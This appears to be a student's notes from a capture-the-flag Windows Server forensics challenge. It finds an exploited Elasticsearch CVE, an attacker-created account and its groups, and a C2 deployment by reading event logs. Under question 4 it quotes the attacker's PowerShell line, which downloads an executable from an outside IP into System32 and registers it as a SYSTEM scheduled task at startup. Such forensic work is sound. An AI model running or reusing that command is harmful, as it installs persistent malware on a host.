Files
ctf/byuctf/forensics/windows/notes.md
2025-05-27 03:40:34 +02:00

2.2 KiB

Forensic Investigation Windows Server 2008

Setup

Download .ova file. Since m1 can't run x86 ova files on virtualbox extract files from .ova file with tar -xvf <file>.ova Convert drive to qcow2 Reference: https://www.xmodulo.com/convert-ova-to-qcow2-linux.html Run qemu with: qemu-system-x86_64 -boot menu=on -m 4G -vga virtio -display cocoa <file>.qcow2

Questions:

1. What CVE did the attacker exploit to get a shell on the machine? Wrap your answer in byuctf{}. E.g. byuctf{CVE-2021-38759} Hint: Figure out what process the attacker exploited and look up vulnerabilities associated with it.

When opening sysmon logs a powershell process opens from elasticsearch. This was supspicous. The most likely exploit is one with a public CVE

byuctf{CVE-2014-3120}

2. Once they got in, the attacker ran some commands on the machine, but it looks like they tried to hide what they were doing. See if you can find anything interesting there

3. The attacker also created a new account what group did they add this account to?

According to https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/audit-user-account-management User Account creation has the Id 4720. Opening Event Viewer and filtering for 4720 yields: 5/15/2025 7:08:28 pm User account phasma was created To get the groups we have to look at Event 4732 https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732 This yields two entries from 5/15/2025:

  • BUILTIN\Users
  • BUILTIN\Remote Desktop Users

=> Flag: byuctf{Remote Desktop Users}

4. Using their access, the attacker also deployed a C2 binary on the machine - what C2 framework was it, and what IP address was the C2 attempting to connect to?

$BINARY='C:\Windows\System32\update.exe; $ProgressPreference = 'SilentlyContinue'; Invoke-webrequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $Binary ; schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest ; schtasks /run /tn "updates"

5. Last but not least, the attacker put another backdoor in the machine to give themself SYSTEM privileges... what was it?